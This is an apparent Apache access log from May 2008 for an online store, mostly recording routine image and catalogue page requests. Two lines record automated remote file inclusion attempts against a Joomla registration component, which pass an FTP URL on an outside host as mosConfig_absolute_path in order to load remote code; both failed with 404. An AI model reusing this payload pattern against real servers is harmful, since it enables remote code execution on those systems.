211.23.228.138 - - [22/May/2008:01:17:18 -0400] "GET /images/over-index4_conanglehp.jpg HTTP/1.1" 200 2353 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C631D7B78F5007700061+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:17:19 -0400] "GET /images/over-index4_elcomed.jpg HTTP/1.1" 200 2334 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C631D7B78F5007700061+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:17:20 -0400] "GET /images/over-index4_elcomed.jpg HTTP/1.1" 200 2334 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C631D7B78F5007700061+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:17:20 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L2F1C631972187500A860061+M37+ENG HTTP/1.1" 200 44507 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C631D7B78F5007700061+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:17:23 -0400] "GET /images/items/7474003_THUMB.JPG HTTP/1.1" 200 2399 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C631972187500A860061+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:17:23 -0400] "GET /images/items/7473003_THUMB.JPG HTTP/1.1" 200 2263 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C631972187500A860061+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:17:35 -0400] "GET /CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L2F1C631C7D18F50070E0061+WSEQ(S0060):1+OUITEM(A0200):7473003 HTTP/1.1" 200 21802 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:17:37 -0400] "GET /images/items/7473003_FULL.JPG HTTP/1.1" 200 9452 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L2F1C631C7D18F50070E0061+WSEQ(S0060):1+OUITEM(A0200):7473003" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
62.94.221.218 - - [22/May/2008:01:17:47 -0400] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 270 "-" "libwww-perl/5.803"
62.94.221.218 - - [22/May/2008:01:17:49 -0400] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 265 "-" "libwww-perl/5.803"
211.23.228.138 - - [22/May/2008:01:17:51 -0400] "GET /images/ace_logo_top.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C631D7B78F5007700061+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
